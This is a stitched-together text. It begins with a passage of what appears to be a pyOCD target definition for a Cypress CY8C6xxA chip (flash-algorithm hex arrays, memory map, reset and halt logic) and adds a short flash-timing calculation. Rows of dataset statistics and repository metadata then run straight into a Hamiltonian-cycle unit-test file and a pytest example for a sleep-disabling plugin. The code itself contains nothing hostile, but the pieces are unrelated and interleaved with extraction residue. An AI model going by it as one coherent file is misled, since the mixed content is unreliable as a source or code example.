0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000
],
# Relative function addresses
'pc_init': 0x08000021,
'pc_unInit': 0x08000027,
'pc_program_page': 0x08000041,
'pc_erase_sector': 0x08000035,
'pc_eraseAll': 0x0800002d,
'static_base': 0x08000000 + 0x00000020 + 0x000009f8,
'begin_stack': 0x08000d00,
'begin_data': 0x08000000 + 0x1000,
'page_size': 0x200,
'analyzer_supported': False,
'analyzer_address': 0x00000000,
'page_buffers': [0x08001000, 0x08001200], # Enable double buffering
'min_program_length': 0x200,
# Flash information
'flash_start': 0x14000000,
'flash_size': 0x8000,
'sector_sizes': (
(0x0, 0x200),
)
}
flash_algo_sflash = {
'load_address': 0x08000000,
# Flash algorithm as a hex string
'instructions': [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x20004603, 0x46014770, 0x47702000, 0xf000b510, 0xbd10f9aa, 0x4604b510, 0xf0004620, 0xbd10f976,
0x4606b570, 0x4615460c, 0x46294622, 0xf0004630, 0xbd70f94d, 0x4604b570, 0x4616460d, 0x46294632,
0xf0004620, 0xbd70f81f, 0x47706001, 0x600a6802, 0x21004770, 0x1c49e000, 0x43424ae4, 0xd8fa428a,
0xb5084770, 0x48e24669, 0xfff0f7ff, 0x0209210f, 0x40089800, 0xd1012800, 0xe0002001, 0x46032000,
0xbd084618, 0x4603b570, 0x461d460c, 0xe0052100, 0x5c6e5c50, 0xd00042b0, 0x1c49e002, 0xd3f742a1,
0x1858bf00, 0xb5febd70, 0x460b4605, 0x20004616, 0x24009002, 0x01682700, 0x184049ce, 0xbf009000,
0x9800a901, 0xf7ff301c, 0x9801ffc1, 0x2b000fc7, 0x2f00d001, 0x2b00d103, 0x2f00d103, 0x2001d101,
0x2000e000, 0x2c004604, 0x9802d109, 0xd90042b0, 0x2001e007, 0xffadf7ff, 0x1c409802, 0x2c009002,
0xbf00d0de, 0x21014620, 0xbdfe4048, 0x4604b5f8, 0x2600460d, 0x01602300, 0x184749b6, 0x4669bf00,
0xf7ff4638, 0x9800ff93, 0x2b000fc3, 0x42aed106, 0xe005d900, 0xf7ff2001, 0x1c76ff8c, 0xd0ee2b00,
0x4618bf00, 0x40482101, 0xb5f0bdf8, 0x460d4607, 0x26004613, 0xbf002400, 0x46384619, 0xff76f7ff,
0x0f006818, 0x21050700, 0x42880749, 0x2001d101, 0x2000e000, 0x2c004604, 0x42aed106, 0xe005d900,
0xf7ff2001, 0x1c76ff66, 0xd0e52c00, 0x4620bf00, 0x40482101, 0xb5f3bdf0, 0x4606b082, 0x48962700,
0x90014478, 0x0fc007f0, 0x40482101, 0x25009000, 0xff57f7ff, 0xd0022800, 0x4d8e2400, 0x2401e002,
0x35204d8c, 0x31f521ff, 0xf7ff4620, 0x4607ff9f, 0xd1362f00, 0x28009800, 0x4628d005, 0x9901300c,
0xff32f7ff, 0x4631e004, 0x300c4628, 0xff2cf7ff, 0x30104620, 0x40822201, 0x48804611, 0xff24f7ff,
0x46282101, 0xf7ff3008, 0x22ffff1f, 0x210032f5, 0xf7ff4620, 0x4607ff48, 0xd1122f00, 0x28009800,
0x21ffd007, 0x9a0331f5, 0xf7ff9801, 0x4607ff8e, 0x21ffe007, 0x462831f5, 0x9a03300c, 0xff85f7ff,
0x46384607, 0xbdf0b004, 0x4604b538, 0x447d4d6a, 0x496b3dae, 0xf7ff4628, 0x4621fef7, 0xf7ff1d28,
0x4669fef3, 0xf7ff4866, 0xbd38ff96, 0x4604b538, 0x447d4d61, 0x49633dd2, 0xf7ff4628, 0x4621fee5,
0xf7ff1d28, 0x4669fee1, 0xf7ff485e, 0xbd38ff84, 0x4604b538, 0x447d4d58, 0x495a3df6, 0xf7ff4628,
0x4621fed3, 0xf7ff1d28, 0x4669fecf, 0xf7ff4855, 0xbd38ff72, 0x4c54b518, 0x4954447c, 0xf7ff4620,
0x4669fec3, 0xf7ff4851, 0xbd18ff66, 0x4605b5f8, 0x4617460e, 0x447c4c4c, 0x494d3c1e, 0xf7ff4620,
0x21fffeb3, 0x1d203107, 0xfeaef7ff, 0x46204629, 0xf7ff3008, 0x4631fea9, 0x300c4620, 0xfea4f7ff,
0x48434669, 0xff47f7ff, 0xb570bdf8, 0xb081b0ff, 0x26004605, 0xe0032400, 0x46692000, 0x1c645508,
0x02402001, 0xdbf74284, 0x46694602, 0xf7ff4628, 0x4606ffcd, 0xb07f4630, 0xbd70b001, 0x4606b570,
0x2500460c, 0x4630e00a, 0xffdff7ff, 0x2d004605, 0xe005d000, 0x36ff36ff, 0x1e643602, 0xd1f22c00,
0x4628bf00, 0xb510bd70, 0xbf002400, 0x48292104, 0xffe4f7ff, 0x2c004604, 0xe015d000, 0x48262101,
0xffdcf7ff, 0x2c004604, 0xe00dd000, 0x48232106, 0xffd4f7ff, 0x2c004604, 0xe005d000, 0x48202102,
0xffccf7ff, 0xbf004604, 0x4620bf00, 0xb5f8bd10, 0x460e4605, 0x4c1b4617, 0x491b447c, 0xf7ff4620,
0x21fffe43, 0x1d203107, 0xfe3ef7ff, 0x46204629, 0xf7ff3008, 0x4631fe39, 0x300c4620, 0xfe34f7ff,
0x48114669, 0xfed7f7ff, 0x0000bdf8, 0x00000d05, 0x40200000, 0x40220000, 0x00000288, 0x40221008,
0x1c000100, 0x14000100, 0x00000170, 0x0a000100, 0x05000100, 0x16000800, 0x16001a00, 0x16005a00,
0x16007c00, 0x00000070, 0x06000100, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000
],
# Relative function addresses
'pc_init': 0x08000021,
'pc_unInit': 0x08000027,
'pc_program_page': 0x08000041,
'pc_erase_sector': 0x08000035,
'pc_eraseAll': 0x0800002d,
'static_base': 0x08000000 + 0x00000020 + 0x00000a40,
'begin_stack': 0x08000d00,
'begin_data': 0x08000000 + 0x1000,
'page_size': 0x200,
'analyzer_supported': False,
'analyzer_address': 0x00000000,
'page_buffers': [0x08001000, 0x08001200], # Enable double buffering
'min_program_length': 0x200,
# Flash information
'flash_start': 0x16000000,
'flash_size': 0x8000,
'sector_sizes': (
(0x0, 0x200),
)
}
ERASE_ALL_WEIGHT = 0.5 # Time it takes to perform a chip erase
ERASE_SECTOR_WEIGHT = 0.05 # Time it takes to erase a page
PROGRAM_PAGE_WEIGHT = 0.07 # Time it takes to program a page (Not including data transfer time)
class CY8C6xxA(CoreSightTarget):
VENDOR = "Cypress"
memoryMap = MemoryMap(
RomRegion(start=0x00000000, length=0x20000),
FlashRegion(start=0x10000000, length=0x200000, blocksize=0x200,
is_boot_memory=True,
erased_byte_value=0,
algo=flash_algo_main,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
FlashRegion(start=0x14000000, length=0x8000, blocksize=0x200,
is_boot_memory=False,
erased_byte_value=0,
algo=flash_algo_work,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
FlashRegion(start=0x16000000, length=0x8000, blocksize=0x200,
is_boot_memory=False,
erased_byte_value=0,
is_testable=False,
algo=flash_algo_sflash,
erase_all_weight=ERASE_ALL_WEIGHT,
erase_sector_weight=ERASE_SECTOR_WEIGHT,
program_page_weight=PROGRAM_PAGE_WEIGHT),
RamRegion(start=0x08000000, length=0x10000)
)
def __init__(self, link):
super(CY8C6xxA, self).__init__(link, self.memoryMap)
def create_init_sequence(self):
seq = super(CY8C6xxA, self).create_init_sequence()
seq.replace_task('create_cores', self.create_cy8c6xx7_core)
return seq
def create_cy8c6xx7_core(self):
core0 = CortexM_CY8C6xxA(self, self.aps[1], self.memory_map, 0)
core0.default_reset_type = self.ResetType.SW_SYSRESETREQ
core1 = CortexM_CY8C6xxA(self, self.aps[2], self.memory_map, 1)
core1.default_reset_type = self.ResetType.SW_SYSRESETREQ
self.aps[1].core = core0
self.aps[2].core = core1
core0.init()
core1.init()
self.add_core(core0)
self.add_core(core1)
class CortexM_CY8C6xxA(CortexM):
def reset(self, reset_type=None):
self.notify(Notification(event=Target.EVENT_PRE_RESET, source=self))
self._run_token += 1
if reset_type is Target.ResetType.HW:
self.session.probe.reset()
sleep(0.5)
self._ap.dp.init()
self._ap.dp.power_up_debug()
# This is ugly, but FPB gets disabled after HW Reset so breakpoints stop working
self.bp_manager._fpb.enable()
else:
if reset_type is Target.ResetType.SW_VECTRESET:
mask = CortexM.NVIC_AIRCR_VECTRESET
else:
mask = CortexM.NVIC_AIRCR_SYSRESETREQ
try:
self.write_memory(CortexM.NVIC_AIRCR, CortexM.NVIC_AIRCR_VECTKEY | mask)
self.flush()
except exceptions.TransferError:
self.flush()
with Timeout(5.0) as t_o:
while t_o.check():
try:
dhcsr_reg = self.read32(CortexM.DHCSR)
if (dhcsr_reg & CortexM.S_RESET_ST) == 0:
break
except exceptions.TransferError:
self.flush()
self._ap.dp.init()
self._ap.dp.power_up_debug()
sleep(0.01)
self.notify(Notification(event=Target.EVENT_POST_RESET, source=self))
def wait_halted(self):
with Timeout(5.0) as t_o:
while t_o.check():
try:
if not self.is_running():
return
except exceptions.TransferError:
self.flush()
sleep(0.01)
else:
raise Exception("Timeout waiting for target halt")
def reset_and_halt(self, reset_type=None):
self.halt()
self.reset(reset_type)
sleep(0.5)
self.halt()
self.wait_halted()
if self.core_number == 0:
vtbase = self.read_memory(0x40201120) # VTBASE_CM0
elif self.core_number == 1:
vtbase = self.read_memory(0x40200200) # VTBASE_CM4
else:
raise Exception("Invalid CORE ID")
vtbase &= 0xFFFFFF00
if vtbase < 0x10000000 or vtbase > 0x18000000:
logging.info("Vector Table address invalid (0x%08X), will not halt at main()", vtbase)
return
entry = self.read_memory(vtbase + 4)
if entry < 0x10000000 or entry > 0x18000000:
logging.info("Entry Point address invalid (0x%08X), will not halt at main()", entry)
return
self.set_breakpoint(entry)
self.reset(self.ResetType.SW_SYSRESETREQ)
sleep(0.2)
self.wait_halted()
self.remove_breakpoint(entry)
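The flash algorithm dicts and weight constants above are enough for a rough timing estimate. The arithmetic below uses only values visible in this file and, as the PROGRAM_PAGE_WEIGHT comment notes, ignores data-transfer time; it is a back-of-the-envelope sketch, not part of pyOCD.
# Rough estimate for the 2 MB main flash region defined above.
ERASE_SECTOR_WEIGHT = 0.05   # s per 0x200-byte sector
PROGRAM_PAGE_WEIGHT = 0.07   # s per 0x200-byte page, excluding transfer time

flash_size = 0x200000
page_size = 0x200
pages = flash_size // page_size        # 4096 pages
print(pages * PROGRAM_PAGE_WEIGHT)     # ~286.7 s to program every page
print(pages * ERASE_SECTOR_WEIGHT)     # ~204.8 s to erase sector by sector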
| 68.681188
| 103
| 0.718602
| 2,934
| 34,684
| 8.421609
| 0.214724
| 0.944595
| 1.41325
| 1.879477
| 0.769962
| 0.760654
| 0.74653
| 0.735845
| 0.735845
| 0.722004
| 0
| 0.603911
| 0.202428
| 34,684
| 504
| 104
| 68.81746
| 0.289303
| 0.033157
| 0
| 0.61678
| 0
| 0
| 0.025224
| 0
| 0
| 0
| 0.605701
| 0
| 0
| 1
| 0.013605
| false
| 0
| 0.022676
| 0
| 0.054422
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
bcb97e2601de7c72d09ffa9907024254801a81f0
| 3,581
|
py
|
Python
|
graphtheory/hamiltonian/tests/test_hamilton.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 36
|
2015-09-20T20:55:39.000Z
|
2021-09-20T05:49:03.000Z
|
graphtheory/hamiltonian/tests/test_hamilton.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 6
|
2016-03-25T21:41:46.000Z
|
2020-02-12T03:18:59.000Z
|
graphtheory/hamiltonian/tests/test_hamilton.py
|
gitter-badger/graphs-dict
|
2be1a5b140feb050eec799d6cadf6de5eef01745
|
[
"BSD-3-Clause"
] | 9
|
2016-09-12T07:57:27.000Z
|
2022-03-21T16:15:39.000Z
|
#!/usr/bin/python
import unittest
from graphtheory.structures.edges import Edge
from graphtheory.structures.graphs import Graph
from graphtheory.hamiltonian.hamilton import *
# 0 --------- 5
# | \ / |
# | 1 --- 4 |
# | / \ |
# 2 --------- 3
class TestHamiltonianCycle(unittest.TestCase):
def setUp(self):
# 3-prism graph, Halin graph
self.N = 6 # number of nodes
self.G = Graph(self.N, directed=False)
self.nodes = range(self.N)
self.edges = [
Edge(0, 1), Edge(0, 2), Edge(0, 5), Edge(1, 2),
Edge(1, 4), Edge(2, 3), Edge(3, 4), Edge(3, 5), Edge(4, 5)]
for node in self.nodes:
self.G.add_node(node)
for edge in self.edges:
self.G.add_edge(edge)
def test_hamilton(self):
algorithm = HamiltonianCycleDFS(self.G)
algorithm.run(0)
# 5 solutions
expected_cycle = [0, 1, 2, 3, 4, 5, 0]
self.assertEqual(algorithm.hamiltonian_cycle, expected_cycle)
def test_hamilton_with_edges(self):
algorithm = HamiltonianCycleDFSWithEdges(self.G)
algorithm.run(0)
# 5 solutions
expected_cycle = [
Edge(0, 1), Edge(1, 2), Edge(2, 3),
Edge(3, 4), Edge(4, 5), Edge(5, 0)]
self.assertEqual(algorithm.hamiltonian_cycle, expected_cycle)
def test_hamilton_with_cycle_graph(self):
algorithm = HamiltonianCycleDFSWithGraph(self.G)
algorithm.run(0)
# 5 solutions
expected_cycle = [
Edge(0, 1), Edge(1, 2), Edge(2, 3),
Edge(3, 4), Edge(4, 5), Edge(5, 0)]
#print "undirected", list(algorithm.hamiltonian_cycle.iteredges())
for edge in expected_cycle:
self.assertTrue(algorithm.hamiltonian_cycle.has_edge(edge))
def tearDown(self): pass
# 0 ----------o 5
# o \ o |
# | o / |
# | 1 --o 4 |
# | o o |
# | / \ o
# 2 o---------- 3
class TestHamiltonianCycleDirected(unittest.TestCase):
def setUp(self):
# 3-prism graph, Halin graph
self.N = 6 # number of nodes
self.G = Graph(self.N, directed=True)
self.nodes = range(self.N)
self.edges = [
Edge(0, 1), Edge(2, 0), Edge(0, 5), Edge(2, 1),
Edge(1, 4), Edge(3, 2), Edge(3, 4), Edge(5, 3), Edge(4, 5)]
for node in self.nodes:
self.G.add_node(node)
for edge in self.edges:
self.G.add_edge(edge)
def test_hamilton(self):
algorithm = HamiltonianCycleDFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 5, 3, 2, 0]
self.assertEqual(algorithm.hamiltonian_cycle, expected_cycle)
def test_hamilton_with_edges(self):
algorithm = HamiltonianCycleDFSWithEdges(self.G)
algorithm.run(0)
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 5),
Edge(5, 3), Edge(3, 2), Edge(2, 0)]
self.assertEqual(algorithm.hamiltonian_cycle, expected_cycle)
def test_hamilton_with_cycle_graph(self):
algorithm = HamiltonianCycleDFSWithGraph(self.G)
algorithm.run(0)
# 5 solutions
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 5),
Edge(5, 3), Edge(3, 2), Edge(2, 0)]
#print "directed", list(algorithm.hamiltonian_cycle.iteredges())
for edge in expected_cycle:
self.assertTrue(algorithm.hamiltonian_cycle.has_edge(edge))
def tearDown(self): pass
if __name__ == "__main__":
unittest.main()
# EOF
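The tests above depend on HamiltonianCycleDFS from the graphtheory package. As an independent cross-check, the stdlib-only brute force below finds the same cycle [0, 1, 2, 3, 4, 5, 0] in the undirected 3-prism graph built in setUp().
from itertools import permutations

edges = {(0, 1), (0, 2), (0, 5), (1, 2), (1, 4), (2, 3), (3, 4), (3, 5), (4, 5)}

def adjacent(a, b):
    return (a, b) in edges or (b, a) in edges

def hamiltonian_cycles(n):
    # Fix node 0 as the start so rotations of the same cycle are not repeated.
    for rest in permutations(range(1, n)):
        cycle = (0,) + rest + (0,)
        if all(adjacent(a, b) for a, b in zip(cycle, cycle[1:])):
            yield list(cycle)

print(next(hamiltonian_cycles(6)))  # [0, 1, 2, 3, 4, 5, 0]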
| 31.690265
| 74
| 0.569394
| 465
| 3,581
| 4.277419
| 0.144086
| 0.030166
| 0.100553
| 0.030166
| 0.825038
| 0.819507
| 0.819507
| 0.804927
| 0.804927
| 0.793364
| 0
| 0.048877
| 0.291539
| 3,581
| 112
| 75
| 31.973214
| 0.73512
| 0.129573
| 0
| 0.777778
| 0
| 0
| 0.002586
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.138889
| false
| 0.027778
| 0.055556
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcd12628eba46749fed36e7c829ef0029b0eb1e8
| 1,240
|
py
|
Python
|
example/tests/test_imports.py
|
DKorytkin/pytest-never-sleep
|
e655fbff4d51b8a7e41a56e584dae55013f7160f
|
[
"MIT"
] | null | null | null |
example/tests/test_imports.py
|
DKorytkin/pytest-never-sleep
|
e655fbff4d51b8a7e41a56e584dae55013f7160f
|
[
"MIT"
] | 2
|
2021-05-19T07:55:13.000Z
|
2021-05-21T09:49:05.000Z
|
example/tests/test_imports.py
|
DKorytkin/pytest-never-sleep
|
e655fbff4d51b8a7e41a56e584dae55013f7160f
|
[
"MIT"
] | null | null | null |
import time
import pytest
from diff_imports.import_from_module import do_some_stuff
def test_without_mark_and_fixture():
do_some_stuff() # pass if without --disable-sleep
@pytest.mark.usefixtures("disable_time_sleep")
def test_disable_time_sleep_fixture(do):
assert do is None # error
@pytest.mark.usefixtures("enable_time_sleep")
def test_enable_time_sleep_fixture(do):
assert do is None # pass
@pytest.mark.disable_time_sleep
def test_disable_time_sleep_mark():
time.sleep(1) # unstable
@pytest.mark.enable_time_sleep
def test_enable_time_sleep_mark():
time.sleep(1) # pass
class TestClass(object):
def test_without_mark_and_fixture(self):
do_some_stuff() # pass if without --disable-sleep
@pytest.mark.usefixtures("disable_time_sleep")
def test_disable_time_sleep_fixture(self, do):
assert do is None # error
@pytest.mark.usefixtures("enable_time_sleep")
def test_enable_time_sleep_fixture(self, do):
assert do is None # pass
@pytest.mark.disable_time_sleep
def test_disable_time_sleep_mark(self):
time.sleep(1) # unstable
@pytest.mark.enable_time_sleep
def test_enable_time_sleep_mark(self):
time.sleep(1) # pass
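A note on the `do` fixture requested by the tests above: it is not defined in this file. A minimal conftest.py sketch that would satisfy it, under the assumption that the fixture simply runs do_some_stuff() and returns its (None) result, could look like this; the plugin's real example project may define it differently.
import pytest

from diff_imports.import_from_module import do_some_stuff


@pytest.fixture
def do():
    # Hypothetical: run the sleeping helper during fixture setup; the tests
    # then assert the returned value is None, i.e. the call did not raise
    # under the active sleep policy.
    return do_some_stuff()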
| 24.8
| 58
| 0.742742
| 182
| 1,240
| 4.703297
| 0.175824
| 0.21028
| 0.149533
| 0.149533
| 0.880841
| 0.880841
| 0.803738
| 0.78271
| 0.78271
| 0.773364
| 0
| 0.003887
| 0.170161
| 1,240
| 49
| 59
| 25.306122
| 0.827988
| 0.091129
| 0
| 0.5625
| 0
| 0
| 0.062724
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.3125
| false
| 0
| 0.09375
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 1
